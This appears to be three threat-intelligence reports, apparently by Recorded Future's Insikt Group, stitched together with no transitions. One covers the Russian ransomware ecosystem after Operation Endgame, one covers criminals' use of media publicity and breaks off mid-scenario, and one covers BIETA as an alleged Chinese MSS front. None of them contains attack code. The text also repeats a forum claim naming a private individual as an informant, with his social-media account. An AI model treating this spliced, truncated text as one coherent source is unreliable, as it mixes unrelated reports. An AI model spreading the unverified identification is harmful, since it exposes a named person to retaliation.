Users on Exploit and XSS forums also shared their thoughts regarding the fate of individuals named and arrested in the campaigns. In a thread about the DanaBot takedown and arrests during Operation Endgame, user Theriella wrote about the possibility of suspects being recruited by either the American or Russian government, claiming that in the latter case, they will be “forced to work for the government in a golden cage with a collar.” This “golden cage” narrative aligns with Dark Covenant dynamics: selective coercion converts high-skill criminals into semi-deniable assets, preserving capability while tightening state leverage. The same thread discussed operational security mistakes that arose as a result of a memory leak vulnerability in DanaBot code itself, which leaked threat actor usernames, IP addresses, command-and-control (C2) infrastructure domains and addresses, private keys, and more. In a separate XSS thread discussing the 2024 operation, users analyzed Operation Endgame’s videos posted to the takedown website, discussing which usernames are linked to an individual, or theorizing about what law enforcement knows about various individuals and who is a “rat” that led to the arrests.

Attribution speculation and “rat” hunting fragment trust and push threat actors toward tighter compartmentation, consistent with the shift from open forums to curated circles. Another user, “Asist”, commented that the account associated with SmokeLoader (“SmokeLdr”) should be banned for security reasons, though as of September 2025, the account remains on the forum. The reluctance to ban legacy brands underscores the weight of reputation and revenue potential even amid security concerns.

Discussions of the law enforcement operations themselves also seemed to spur more existential discussions on the forums around the cost-benefit analysis of engaging in financially motivated cybercrime at all. In one thread on Exploit Forum, the user “RichAsHell” commented on the difficulty of netting high profits via cybercriminal activity, particularly for those just starting out, stating that the risk of decades in prison makes working in “white” (non-criminal enterprise) to make comparable profits more appealing. This reevaluation reflects rising transaction costs (deposits, stricter vetting, closed channels) and elevated perceived risk — clear downstream effects of Operation Endgame and conditional domestic enforcement. The topic was controversial among Exploit users, with some claiming that cybercrime was more profitable than any “white” work in former CIS countries, or other financially struggling economies such as those in Africa and Southeast Asia, especially outside of major cities.

Economic grievance narratives help sustain recruitment despite higher risk, but they also push operators to professionalize and centralize control over who participates. The user “Ex0rci$t” commented that at the inception of Exploit, there was no criminal punishment for carding within the Criminal Code of the Russian Federation, citing the uncertainty around further criminalization of forum activities within Russia. This legal uncertainty is a feature of the covenanted space: ambiguity preserves state flexibility to pressure or protect as needed, maintaining leverage over the market while avoiding categorical commitments.

Transnational Policy Changes in a Post-Operation Endgame Environment

Western governments continue to evolve in their policies toward ransomware, mainly taking a proactive stance and implementing disclosure guidelines so that law enforcement and governments can actually measure the ransomware threat. This shifts the external environment from episodic disruption to continuous measurement and pressure, raising the cost of doing business for Russia-based ecosystems while illuminating where domestic protection sustains activity despite exposure.

While this is happening, the US and Russia have engaged in diplomatic efforts that have resulted in the release of multiple sentenced Russian cybercriminal threat actors (Alexandr Vinnik, Roman Seleznev, and Vladislav Klyushin), which might imply that if an incarcerated threat actor is significant enough, they can weigh this as an option in their negotiations. Klyushin and Seleznev were released in August 2024 as part of a multinational exchange. Klyushin had been arrested for his role in a securities scheme where Klyushin and others hacked into computer networks to steal confidential corporate information that was used to make $93 million in profits through the stock market. Klyushin was likely released due to his company’s contracts with the Kremlin and one of his codefendants being a GRU officer who was involved in hacking the Democratic National Committee in 2016. Roman Seleznev, who was associated with various hacking and payment card fraud schemes, was likely released because he is the son of Russian Duma member Valery Seleznev. Alexander Vinnik was released in February 2025 and had pleaded guilty to laundering billions of dollars in cryptocurrency. Prior to Vinnik’s arrival back in Russia, the Russian Ministry of Internal Affairs had its own investigation to stop his extradition to the US. Due to the prisoner exchange, Russia removed the criminal case against him, and he was freed upon his return to Russia. These swaps underscore how high-value threat actors function as geopolitical assets; the possibility of exchange or protection reduces deterrence for elites and reinforces the covenant’s logic that proximity to state power can offset foreign legal risk.

Since the beginning of Operation Endgame, multiple ransomware attacks originating from Russia continued targeting Western entities, which forced the governments of many countries to reassess their approach toward ransomware payments, negotiations with ransomware operators, reporting procedures, and identifying key adversaries. Below is a list of the major legislative changes for the past years in the US and in some other highly targeted countries. In 2025, the US signed two presidential orders (1, 2) to reinforce the cybersecurity posture that protects the US’s internet and telecommunications infrastructure. The law also allows the US government to take more effective actions against state-sponsored cyberattacks orchestrated by the governments of Russia, China, Iran, and North Korea, and implies the development of minimum cybersecurity standards for government technology contractors with a primary focus on China. By formalizing authorities and standards, Western states are narrowing the gray space in which state-tolerated criminal actors operate, making it harder for Russia-based threat groups to rely solely on domestic protection while transacting internationally.

In addition, Japan is moving to a more offensive cyber approach. On May 16, 2025, Japan implemented a new Active Cyberdefense Law that permits the authorities of Japan to perform offensive cyber operations regarding hostile infrastructure and adversaries, including infiltrating and neutralizing hostile servers before any malicious activity has taken place, and decreasing the level of attacks on Japan. This normalization of preemptive action signals that the external pressure on Russia-based ecosystems will include active defense — not just post-incident cleanup — compressing the operational windows the covenant seeks to preserve.

• On May 31, 2025, Australia began enforcing new ransomware payment disclosure rules under the Cyber Security Bill 2024, requiring businesses with an annual revenue above $3 million AUD (USD $1.92 million) to report any ransom payments to the Australian Signals Directorate (ASD) within 72 hours. This legislation, while not making ransom payments illegal, mandates transparency to enhance the government’s insight into ransomware activity and inform future cybercrime legislation. Companies must report details such as their Australian Business Number, timing of the attack, whether data was stolen or encrypted, vulnerabilities exploited, the ransom amount and currency, and the financial impact on the business.
• On January 14, 2025, the UK government initiated an open consultation called “Ransomware: proposals to increase incident reporting and reduce payments to criminals” with a proposed launch date of April 8, 2025. According to the proposal, regarding a ban on all public sector bodies, including schools, the National Health Service (NHS), operators of Critical National Infrastructure (CNI), and local councils, from making ransomware payments. The proposals also include mandatory reporting of ransomware incidents, aiming to enhance transparency and improve response strategies. Previously, UK government departments were banned from paying ransoms to ransomware operators. That process is a part of the broader strategy to combat cybercrime and minimize the risk of financial losses and other damages to businesses and infrastructure. As of this writing, the legislation has not been implemented yet, but the published government response demonstrates a strong intention to proceed further with legislation in the foreseeable future.

Payment visibility and bans reduce liquidity for RaaS ecosystems, raise negotiation risk, and weaken extortion leverage. This constrains the monetization channel that domestic protection alone cannot guarantee, pressuring Russia-based threat actors to adapt or lose profitability.

Operational Adaptations by Russian Cybercriminals

In April 2025, Russian law enforcement arrested Aeza Group CEO Arseniy Penzyev and co-founder Yuri Bozoyan for their alleged role in hosting the darknet marketplace BlackSprut, a platform that had previously gained public attention through unexplained billboard advertisements in Moscow. While Russian authorities have historically tolerated or ignored many hosting providers advertising on criminal forums, Aeza’s direct connection to the domestic narcotics market appears to have crossed a political threshold that prompted intervention. This incident illustrates how enforcement action in Russia can occur suddenly and selectively, without signaling broader policy change. When criminal infrastructure draws unwanted public or political attention, tolerance narrows and authorities demonstrate consequences, even as adjacent cyber or influence operations remain unimpeded.

The Aeza arrests were followed by a considerable loss of trust in the provider within the cybercriminal ecosystem, with multiple user complaints about downtime and payment suspensions surfacing on forums such as LolzTeam (which resulted in the ban of Aeza’s account for “scamming”). Multiple other Russian TAEs, such as CloudBlast and VDSina, moved quickly to fill the vacuum left by Aeza, offering targeted “refugee services.” Additionally, the US government announced sanctions against Aeza in July 2025, with the UK following suit in September 2025 for their role in various ransomware operations. Shortly after OFAC’s designation, Insikt Group observed moves by Aeza to diversify its brand and migrate portions of its infrastructure to Serbian provider Smart Digital Ideas D.O.O. and UK-based Hypercore Ltd., likely to protect its IP assets. At the same time, the company continues to rely on Russian financial systems such as WebMoney, YooMoney, and Mir for payments.

We assess that this likely reflects an attempt by Aeza to retain IP assets, while balancing operations between enforcement strategies inflicted by both Western governments and Russian domestic law enforcement. Notably, Aeza had also been linked to hosting some infrastructure for the pro-Kremlin disinformation campaign Doppelgänger, active in Europe since at least 2022, all while also being headquartered at the former PMC Wagner Centre. This suggests that while Russian authorities may tolerate and even use hosting services tied to cybercrime for their own operations, it is possible that direct association with domestic narcotics distribution introduced political sensitivity that appears to have prompted intervention. The geographic diversification approach is a typical criminal adaptation within the hosting ecosystem, particularly for organizations operating across jurisdictions with different levels of tolerance: migrate infrastructure abroad while anchoring monetization at home, preserving access to domestic protection and payments, even as reputational and regulatory pressure increases.

On the other hand, alleged TAEs such as Stark Industries and Zservers have demonstrated some resilience to adapt to Western enforcement actions, including sanctions. Stark Industries likely leveraged media reporting to preemptively migrate some of its infrastructure to Moscow-based UFO Hosting to ensure continuity of operations. Prior to these sanctions, Stark Industries was also reportedly cooperative with Western law enforcement in Operation Endgame. Insikt Group did not observe similar actions from Zservers, which was also sanctioned. It is of note that its site is still active, despite several threat actors indicating the service had “died.”

These heterogeneous strategies of implementing preemptive repositioning, foreign façades, diversifying footprints, and selective cooperation illustrate how TAEs and similar organizations navigate the complex operating environment within the Russian Federation and Commonwealth of Independent States. These threat actors remain useful to state priorities, providing a key service (infrastructure) while allowing the state to maintain plausible deniability globally; however, these providers must avoid providing services to domestically sensitive issues to avoid unexpected enforcement actions.

Ransomware Adapts and Grows Despite External Pressure

The primary trends Insikt Group observed since the beginning of Operation Endgame can be divided into two groups: those that continued to evolve from the previous report’s timeframe and new trends that significantly changed the ransomware threat landscape. These trends reflect a market seeking volume and dispersion to offset enforcement, while concentrating trust and protection where domestic cover is strongest. Among the primary evolution trends were the following:

First, a stable growth in the number of new ransomware variants. For example, from May to December 2024, we identified at least 192 new ransomware variants. From January to September 2025, the number of new variants was 236. The majority of the variants originated from leaked source code and builders from existing ransomware families such as LockBit, CryLock, Xorist, Proton, GlobeImposter, Chaos, Makop, MedusaLocker, Djvu, Dharma, and more. We assess that this trend will continue and increase in volume. The launch of a new ransomware variant can and often does garner media attention, something that a threat actor or group may want at times. As threat groups gain knowledge in developing and deploying their own ransomware variants via leaked data, they will likely add this attack vector type to their TTPs. In some cases, Insikt Group observed that allegedly different ransomware variants used identical methods of communication, which indicates these threat actors have low credibility. Proliferation via leaked builders spreads capability without deep benches or protection, producing noisy “brands” that chase attention but lack credibility — an ecosystem-level adaptation that raises defenders’ triage burden while leaving core, protected crews comparatively insulated. To name a few examples:

• Root ransomware, Foxtrot ransomware, and Pomochit ransomware used identical email addresses (pomocit01@kanzensei[.]top and pomocit01@surakshaguardian[.]com).
• Destroy ransomware and AttackNew ransomware used identical email addresses (ithelp01@securitymy[.]name and ithelp01@yousheltered[.]com).

Second, there has been a stable growth of new ransomware extortion websites. For example, from May 2024 to December 2024, Insikt Group identified 34 extortion websites, and from January 2025 to September 2025, 60 extortion blogs. More blogs diversify pressure channels and complicate takedowns but also fragment trust; serious operators respond by steering negotiations to curated venues, reinforcing closed-circle dynamics consistent with the covenant. Not all ransomware variants operate their own extortion blogs. Insikt Group assesses that it is relatively easy to create and deploy a new variant, but there is a bottleneck as to whether the variant is actually successful enough to obtain victim data for launching an extortion website.

Third, ransomware focus has turned toward Asian countries. In 2024, India was the most targeted country in Asia and number seven in the world, with 100 listed victims on extortion websites. In June 2025, Israel became number four among the most targeted countries worldwide. However, it is likely that Israel was targeted more frequently than usual this month due to the conflict with Iran, which spurred a wave of opportunistic attacks by various cybercriminals. Shifts in geography reflect opportunism and political risk management: threat actors pursue high-yield targets while avoiding jurisdictions that threaten domestic protection or trigger disproportionate response.

Fourth, new ransomware groups continue using pressure tactics to extort victims, such as distributed denial-of-service (DDoS) attacks or phone calls to victims to threaten them to pay ransom. These new RaaS groups will also continue hiring affiliate members openly, primarily via their extortion blogs or Telegram channels or forums, specifically Ramp Forum. Escalation tactics substitute for waning payment rates; open hiring persists at the edge of the market, while established brands tighten gates — dual tracks that balance volume with survivability.

Fifth, operators of ransomware variants based on leaked source codes of notable ransomware brands widely adopted another pressure method: double ransom payments unless a victim pays a ransom within 24, 48, or 72 hours after a ransomware attack. Time-based penalties aim to compress negotiation windows before law-enforcement and regulatory friction can intervene, acknowledging a more hostile external environment.

Sixth, existing ransomware groups continued to rebrand for security reasons. Rebranding serves as a reputational reset and legal smokescreen, enabling protected cores to shed heat while retaining talent, infrastructure, and state-aligned utility within the covenant’s protective boundaries.

Changes in Ransomware TTPs

Since May 2024, Insikt Group has observed different approaches in the business model of RaaS operators and changing TTPs. New approaches we observed are outlined in Appendix B.

Increase in Rivalries Between Ransomware Groups

Dragon Force, RansomBay, and RansomHub Conflict

In April 2025, Insikt Group identified that Dragon Force Ransomware Group announced several controversial statements regarding its project ”DragonBay” and RansomHub Ransomware Group on the forum Ramp:

• On April 1, 2025, it was noticed that RansomHub Ransomware Group went offline and stopped operations. Some researchers stated that at least part of the threat group likely migrated to Qilin RaaS since the number of its victims almost doubled since February 2025. Qilin Ransomware Group was observed advertising a new RaaS version and hiring more affiliate members.
• Almost simultaneously, on April 2, 2025, the threat actor dragonforce released a statement that indicates that RansomHub likely joined their infrastructure and started cooperating.

On April 25, 2025, dragonforce denied any attacks against RansomHub Ransomware Group on Ramp Forum. However, on April 28, 2025, the threat actor “koley”, a member of RansomHub Ransomware Group, claimed that Dragon Force Ransomware Group was responsible for the attack against RansomHub’s infrastructure and disruption to its operations. Also, they stated that they identified a traitor within RansomHub, an individual with the moniker “sarg0n” (possibly sarg0n, a member of Exploit and XSS forums) whose alleged name is “Дмитрий Игоревич Кудинов” with the VK account vk[.]ru/id6571635. Also, koley stated that Dragon Force Ransomware Group has contacts in the FSB, such as RansomHub. koley stated that the attack on RansomHub was a declaration of war between the two cybercriminal groups.

Dragon Force: Possible Attacks on Everest, LockBit, BlackLock (Mamona) Ransomware Groups

On March 18, 2025, Dragon Force Ransomware Group announced that it was operating as the
Dragon Force ransomware cartel, and 24 hours later, it was observed conducting DDoS attacks and defacements against competitors’ extortion websites, such as BlackLock Blog and Mamona Blog. Both websites are variants of El Dorado Ransomware Group and are operated by the same threat actor, “$$$”.

Later, on April 5, 2025, the extortion website named “Everest Ransom Team” used by the ransomware group Everest went offline after being apparently hacked and defaced over the prior weekend. Victim listings on the website were replaced by the message “Don’t do crime CRIME IS BAD xoxo from Prague.” It is not clear whether the incident is legitimate or who may be behind it (the same message was posted by an unknown user to LockBit’s administrator affiliate panel — available in LockBit Leaked Chats), as law enforcement disruption operations, which have expanded in recent years, usually replace the websites they target with a splash page announcing the operation and identifying the agencies involved. The Everest blog defacement does not purport to come from a law enforcement agency, and no affiliates have been identified complaining about being “exit-scammed” on dark web forums. As of this writing, the extortion blog continues operating. However, it is possible that LockBit and Everest ransomware groups were targeted by Dragon Force.

Impact on Payments, Target Strategies, and Profitability

Since the beginning of Operation Endgame and multiple other successful law enforcement operations worldwide, Insikt Group has analyzed reports and statistics related to the financial gains and losses of ransomware operators and identified that they have been receiving fewer ransom payments since 2024, and this trend is continuing in the first half of 2025. In addition, exploitation of vulnerabilities, phishing attacks, and attacks via malicious emails are primary attack vectors to infect victims with ransomware.

Analysis of the reporting related to ransom payments indicates that the average ransomware payments in the first half of 2025 slightly decreased:

• Sophos released the report “The State of Ransomware” on June 30, 2025, which indicates that 32% of ransomware attacks resulted from vulnerability exploitation; data decryption rates decreased to 50% in 2025 (70% in 2024). Average (median) ransom demands decreased by 34% to $1,324,439, down from $2 million in 2024. Average (median) ransom payments dropped by 50% in 2025 ($1 million) from 2024 ($2 million).
• Coveware released a report on May 1, 2025, that indicates that an average ransom payment in Q1 2025 was $552,777 (-0.2% in comparison with Q4 2024). The median ransom payment in Q1 2025 was $200,000 (+80% in comparison with Q4 2024).
• Chainalysis reported on February 5, 2025, that in 2024, ransomware operators earned approximately $813.55 million in ransom payments, which indicates a 35% decrease from 2023, with $1.25 billion in ransom payments. Also, data leak websites posted more victims in 2024 than in any year prior; however, these data extortion websites often list already public information or repost from other sources to mislead and scam victims, law enforcement, and cybersecurity researchers. Another significant reason for that was likely the collapse of two major ransomware groups in 2024: LockBit 3.0 (“Operation Cronos,” February 2024) and ALPHV (which performed an exit scam in January 2024). Emerging ransomware groups cannot achieve the same scale of operations and market share as the above-mentioned variants.

Outlook

The Russian cybercriminal ecosystem is unlikely to contract — it will continue to reconfigure. We assess with high confidence that selective Russian enforcement will keep burning expendable monetization and infrastructure nodes while insulating high-utility operator circles, sustaining a conditional safe haven that adapts, rather than yields, to Western pressure. Over the next six to twelve months, Russian authorities will likely prioritize actions against low-utility enablers (such as cash-out brokers and politically sensitive hosting services tied to domestic optics) while avoiding decisive action against operators perceived to have intelligence or geopolitical value. Expect more Cryptex/UAPS-style cases and continued ambiguity around elite figures named in Western actions.

Cash-out friction will rise as seizures, sanctions, and episodic Russian cases disrupt trusted rails, prompting diversification through mixers, OTC brokers, and friendly jurisdictions. The result is higher transaction costs and delays, not a collapse of revenue. In parallel, trust erosion on forums will continue to push recruitment and negotiations from open marketplaces into semi-closed circles that require deposits, KYC-lite checks, and cultural gating. Open RaaS advertisements will persist at the margins to feed volume, while credible brands harden gates to protect continuity.

Business model churn will persist. We expect continued growth of data-extortion-only offerings, triple-extortion add-ons such as DDoS and call pressure, and investment-style affiliate schemes. Temporary privatization — going quiet under pressure, then resurfacing when attention shifts — will remain a common resilience pattern, as seen in commodity infostealer ecosystems. The net effect: shorter public exposure cycles and longer private monetization windows.

OPSEC will get heavier but remain uneven. Threat actors will keep migrating off centralized platforms and stacking toolchains (Tails, virtual machines [VMs], and hidden volumes), yet usability gaps and misconfigurations will continue to create seams defenders can exploit — especially during affiliate onboarding, payment pivots, and communications transitions. At the same time, builder leaks and rapid rebrands will keep spawning numerous low-credibility variants and new blogs, driving overall volume up while reducing signal quality; a smaller core of protected threat actors will retain disproportionate impact amid the noise.

Geography and target selection will remain politically bounded. Explicit carve-outs for CIS and BRICS and opportunistic swings tied to regional crises will endure, reflecting risk management inside the covenant. Threat actors will pursue high-yield opportunities while avoiding blowback in jurisdictions that endanger domestic cover. Western policy pressure will become more continuous as payment disclosures and bans expand, offensive authorities normalize, and multinational takedowns accelerate. Deterrence for elite operators will remain limited so long as swaps, lenient domestic outcomes, and political protection dilute perceived personal risk.

For defenders and policymakers, the implication is clear: durable impact comes from pressure on the incentives of protection as much as on the criminals themselves. Prioritize choke points in cash-out and infrastructure; instrument continuous measurement to detect oscillation between public and private operations; focus on seams in affiliate onboarding and negotiation cycles; and align sanctions and law-enforcement actions with diplomatic levers that raise the domestic cost of protection. In a managed market, the covenant adjusts to shocks; only by reshaping the calculus that sustains protection can disruption scale and persist.

Summary

Cybercriminals use publicity as a tactic to boost their own reputations and increase extortion pressure on victims.

Some ransomware groups and individual threat actors directly engage with the media by contacting journalists or alternative media, or by posting announcements, while others indirectly cultivate attention through activity on social media or open forums.

Not all threat actor claims that attract attention are legitimate. However, false or misleading claims can still create legal and brand impairment risks for the targeted company.

Generative artificial intelligence AI) is likely to amplify these risks in the future by enabling threat actors to easily produce false or misleading content related to data breaches.

An intelligence-led incident response plan can help defenders be more resilient to fear and manipulation tactics and avoid reactionary responses to extortion attempts.

Analysis

Threat actors exploit media attention to amplify their impact and enhance their notoriety. Public discourse around cybercrime increases fear, uncertainty, and doubt FUD, especially when false or exaggerated claims are repeated without scrutiny. These strategies are fueled by a reactive media ecosystem that incentivizes being the first to break a story on an emerging threat. Threat actors use this to their advantage to spread their claims, which contributes to manipulating their victims and increasing the effectiveness of extortion attempts.

Figure 1: Criminals directly and indirectly engage with the media to promote their brand and make extortion more impactful Source: Recorded Future)

Weaponizing Reputation

Cybercriminals use strategies to leverage reputation as an operational weapon. A well-known and feared criminal brand can motivate victims to pay more quickly, especially in ransomware cases. Establishing credibility also helps address the “ransomware trust paradox.ˮ If a victim does not believe a ransomware operator will unlock their data, they will not be motivated to pay the extortion demand. Extortionists need their victims to trust them in order to convince them to send extortion payments. Media coverage of successful attacks helps build the trust and authority needed to compel victims to pay.

Criminals also use publicity not just for strategic advantage but for ego. Notoriety fuels personal pride and status within the criminal community. Beyond operational benefits, some criminals gain personal satisfaction from targeting high-profile organizations or showcasing their wealth or technical skills to peers.

Figure 2: The ransomware trust paradox characterizes the dilemma that criminals need their victims to trust them if they want a large extortion payout Source: Recorded Future)

Direct and Indirect Engagement Strategies

Threat actors use direct and indirect tactics to attract public attention. Acting as their own PR team, threat actors claiming affiliation with DragonForce ransomware-as-a-service RaaS contacted the BBC to promote their attacks on British retailers. Media outreach appears to be one of the “servicesˮ offered by DragonForce to promote the brand of the cartel, both to attract affiliates and intimidate extortion victims. Other ransomware groups include contact information on their extortion blogs or Telegram channels, often with explicit calls for journalists to get in touch.

At the same time, threat actors cultivate attention indirectly by promoting attacks on public messaging platforms, such as Telegram channels that are monitored by security researchers and journalists. Threat actors associated with Scattered Spider, a vendor-applied name for a loosely organized criminal collective, leaned on their name recognition and history of industry-based targeting to attract coverage of an alleged “hacking spreeˮ across retail, insurance, and aviation sectors. Criminals operating under the Scattered Spider collective benefited from the perception of an ongoing crime spree, which they used to maximize their own notoriety and increase extortion pressure on victims through threats of widespread publicity.

Figure 3: References to a “hacking spreeˮ spiked following the initial attacks on British retailers in May 2025 Source: Recorded Future)

Similarly, threat actors exploit the fact that researchers and reporters closely monitor dark web activity. Reporting on new forums, emerging threat groups, or alleged data breaches exposes this activity to the general public. While this reporting can be a useful firsthand source of information for researchers and analysts, repeating claims without verification or context risks reinforcing the threat actor narratives.

In some cases, threat actors deliberately fabricate or exaggerate claims to attract attention. LockBit, for example, made headlines after asserting it had breached the US Federal Reserve. However, the group actually breached a much smaller (and less politically significant) financial institution. This claim may have been a ploy to re-establish the groupʼs hacking credentials following law enforcement takedown in February 2024.

Figure 4: Cybersecurity media outlets repeating Lockbitʼs claims of hacking the Federal Reserve Source: Google News Search)

Data thieves also benefit from notoriety. Alleged serial hacker Kai West used the moniker “IntelBrokerˮ to maximize the perceived value of stolen data as well as to bolster his reputation. Prior to his arrest in June 2025, West advertised hacked data for sale 41 times, with the cumulative initial asking price for datasets (where listed) totaling $2.467 million USD. West frequently exaggerated the extent of his exploits, such as his claim to have access to TMobileʼs “source codes,ˮ which turned out to be previously stolen data. Another attention-grabbing tactic involved exploiting a third-party vendor, then claiming to have compromised a more prominent organization that is a customer of that vendor. This may have occurred in the case of IntelBrokerʼs claims to have stolen Appleʼs “internal source code.ˮ However, technical analysis of the stolen data revealed it was proprietary configurations of Appleʼs Jira and Confluence integrations. Westʼs claims were supported by increasing FUD following other breaches that did turn out to be legitimate, such as a hack of DC Health Link, an online health insurance exchange serving Washington, DC.

Figure 5: Despite the uncertainty around the actual impact of the Apple breach, major news outlets and security researchers alike reported the claims Sources: Forbes and HackingBlogs)

Costs of Amplification

Highly publicized false or exaggerated claims can still have a negative impact on a company. “Rose87168ˮ attracted significant attention for their claims to have stolen data from 6 million Oracle Cloud Infrastructure users. However, Recorded Future and other researchers demonstrated that the vast majority of the data was historical, fabricated, or recycled. According to the threat actorʼs social media account, the asking price for the dataset dropped from $65,000 to just $11,000 USD 50 Monero) over a period of three weeks, suggesting low demand. Despite the evidence that the claims were exaggerated, Oracle is facing at least two class-action lawsuits for lax security measures, which have led to data exposure.

Outlook

The accelerating demand for information is likely to put increased “first moverˮ pressure on journalists: The rapid speed of both cyber threats and the social media-driven news cycle puts pressure on cybersecurity journalists to act quickly. While some reporters intentionally prioritize “clickbaitˮ over accuracy, all reporters face tension between timely reporting and conducting a thorough investigation. Threat actors are likely to continue to exploit the first-mover impulse with intentionally trollish or sensational announcements on dark web and criminal forums.

Generative AI will very likely make false claims and exaggerations more convincing: Increasingly effective generative AI tools are very likely to make it easier to manipulate media narratives and public opinion. Criminals can use generative AI to create convincing synthetic datasets to demonstrate the validity of a claim, or use voice and video deepfakes to spawn an intimidating new persona or imitate an existing public figure.

Perception of a breach is likely to have as much impact as the breach itself: Class-action lawsuits due to data breaches are on the rise, with some lawsuits filed before the facts of the incident have been fully established. This means that even false or exaggerated claims are likely to have a negative impact on a companyʼs legal risk, which can be another pressure point threat actors use to extort payouts.

Influence operation tactics are likely to be weaponized against companies: State-sponsored influence operators churn out inauthentic news articles and social media posts that align with their political narratives. Generative AI makes this operation relatively cheap and easy. Criminal groups may decide to replicate these methods if they are unable to organically generate media attention.

Mitigations

Develop an incident response plan: Threat actors want to intimidate ransomware victims into paying extortion demands. Having an incident response plan can help your organization navigate a high-stress situation and avoid reactionary responses.

Ensure your incident response plan includes legal, PR, and crisis communications teams: Make sure all relevant teams in your organization are part of incident response planning and in tabletop exercises. This will help ensure teams outside of your security department are prepared to respond effectively to a publicized ransomware attack.

Be a critical consumer of data breach reporting: Consider the credibility of the source reporting a data breach. Are they simply repeating a claim, or do they provide evidence that shows they have independently verified this incident? Do they have a history of accurate reporting? Are other credible sources providing similar reports? Articles that only quote or reference the threat actor are likely not providing the whole context for a threat.

Accelerate investigations and avoid reactionary responses: Deploy forensic teams early to independently assess whether and to what extent a breach has occurred and provide executives with verified updates for stakeholder communication. Use Recorded Futureʼs Threat Intelligence module as a source of truth to verify information to avoid being reactionary.

Prepare for AI-enhanced information sharing: Train security and communications teams to recognize synthetic datasets, AI-generated screenshots, and deepfake videos that could be used to “proveˮ false breaches. Maintain relationships with trusted industry partners and information-sharing and analysis centers ISACs for rapid threat intelligence sharing.

Risk Scenario

Scenario: A threat actor claims to have stolen millions of lines of customer data from a widely used cloud services provider.

Potential Outcome #1
Stolen database contains a combination of new and previously leaked data

Note: The author, Devin Thorne, thanks Alex Joske for his support in developing this research. More information about the author can be found at the end of this report.

Executive Summary

The Beijing Institute of Electronics Technology and Application (BIETA), a communications technology and information security research organization previously unexplored in public reporting, is almost certainly affiliated with China’s principal civilian intelligence service, the Ministry of State Security (MSS). Based on publicly available sources, it is very likely led by the MSS and likely a public front for the MSS First Research Institute. BIETA and its subsidiary, Beijing Sanxin Times Technology Co., Ltd. (CIII), research, develop, import, and sell technologies that almost certainly support intelligence, counterintelligence, military, and other missions relevant to China’s national development and security. Their activities include researching methods of steganography that can likely support covert communications (COVCOM) and malware deployment; developing and selling forensic investigation and counterintelligence equipment; and acquiring foreign technologies for steganography, network penetration testing, and military communications and planning.

BIETA and CIII almost certainly form part of the very likely vast but underexplored (in public sources) network of front organizations contributing to the modernization of the MSS and wider Chinese state security apparatus, which challenges the interests of both foreign governments and private businesses. BIETA’s almost certain MSS affiliation supports assessments of how the MSS very likely supports cyber-enabled intelligence operations by developing tools for use by intelligence officers and their proxies. Neither BIETA nor CIII are known to engage in illicit activity, but foreign export control authorities, academic institutions, and businesses should consider restricting transactions and other engagements with both BIETA and CIII. Engagement risks contributing to the capabilities of the MSS and People’s Liberation Army (PLA), and could arise through joint research opportunities, overlap at international academic conferences, and product sales channels. Conducting due diligence investigations on any party interested in technologies discussed in this report is vital.

Key Findings

• BIETA’s almost certain ties to the MSS are inferable from the background of four BIETA personnel (three of which are almost certainly or very likely MSS personnel), its relationship with an MSS-run university (the University of International Relations in Beijing), and the scope of its research and other activities.
• BIETA’s research almost certainly contributes to the MSS’s steganographic capabilities that Chinese intelligence officers and contractors likely use to covertly communicate or deploy malware, while other products from BIETA and CIII almost certainly enable MSS and wider state and public security counterintelligence investigations.
• BIETA’s almost certain MSS affiliation offers clarity into the very likely enablement role that the MSS plays with regard to Chinese cyber-espionage and cyber-enabled intelligence operations, wherein the MSS and subordinate state security departments develop and distribute technologies to operational actors.
• Discovery of BIETA also offers new insight into the MSS’s organizational structure: BIETA was likely part of the MSS’s former 13th Bureau, the remit of which was likely much broader than commonly recognized in connection to CNITSEC; it is also plausible that BIETA was part of the former 9th Bureau, which is now 14th Bureau.
• BIETA’s research likely benefits from collaboration with international academics and exposure to international academic conferences, and very likely from foreign steganography technology acquired by CIII. CIII has attempted to support China’s military modernization with foreign software for simulating and modeling communication networks and battlefield environments.

Organizational Overview

The Beijing Institute of Electronics Technology and Application (北京电子技术应用研究所) is a research organization primarily engaged in applied research of communication technology, multimedia information processing, and multimedia information security technology. It has at least one wholly owned subsidiary: Beijing Sanxin Times Technology Co., Ltd. (CIII; 北京三信时代科技有限公司). The activities of BIETA and CIII almost certainly contribute to the capabilities of the MSS and, likely, to those of China’s wider security apparatus and military. The MSS (国家安全部) oversees a nationwide system of semi-autonomous units that constitute a domestic police force and China’s primary civilian intelligence service responsible for human-source and cyber-enabled political and domestic security, counterintelligence and counterespionage, non-military foreign strategic intelligence, and foreign economic and technological intelligence. BIETA and CIII are profiled below.

BIETA

BIETA was established no later than 1990, almost certainly existing in some form as early as 1983 — the year the MSS was created. It is located, per its website, at No. 15 Xinjian Gongmen Road, Haidian District, Beijing (北京市海淀区新建宫门路15号). As shown in Figure 1, this address is adjacent to or within the MSS’s almost certain headquarters compound at Xiyuan (West Garden). BIETA is almost certainly state-owned, given that the website of BIETA’s subsidiary, CIII, describes itself (CIII) as an “enterprise that is owned by the whole people” (全民所有制企业). BIETA is almost certainly affiliated with the MSS, very likely led by the MSS, and likely a front for the MSS First Research Institute.

Figure 1: BIETA’s location in relation to the approximate location of the MSS’s Xiyuan headquarters compound
(Source: Baidu Maps, Google Earth)

BIETA comprises at least four laboratories and one testing center. Its laboratories include the Communication Technology Research Lab, Multimedia Information Security Technology Research Lab, Electromagnetic Compatible Technology Research Lab, and the Hybrid Integrated Circuits Development Research Lab. BIETA’s Quality Testing Center (质量检测中心) is further composed of the Integrated Circuits Testing Experimental Lab, the Network Technology Testing Experimental Lab, the Multi-Media Technology Testing Experimental Lab, the Audio-Visual Subjective Evaluation Room, and the Product Integrated Testing Center Experimental Lab.

BIETA asserts that its “primary research directions," among others, include:

• Wireless, satellite, spread spectrum, and microwave communication technologies
• Information processing and multimedia information security technologies
• Computer vulnerability, information security, signal positioning, and signal jamming technologies

Steganography is another of BIETA’s “primary research directions," and a major focus based on the organization’s publicly visible academic activities. This line of research is discussed in the Steganography section. Other areas of research by BIETA and its researchers include forensics technology (including methods of identifying video files that have been tampered with, text forgeries, fabricated images, source cameras, and source printers), cryptography, networking, and technology miniaturization (of antennas, for example). In 2016, for example, as China’s counter-terrorism campaign in Xinjiang began escalating to include mass detentions of Uyghur and ethnic minorities, BIETA researchers co-authored an academic article on Uyghur text recognition. These areas of research support the assessment that BIETA is almost certainly affiliated with the MSS.

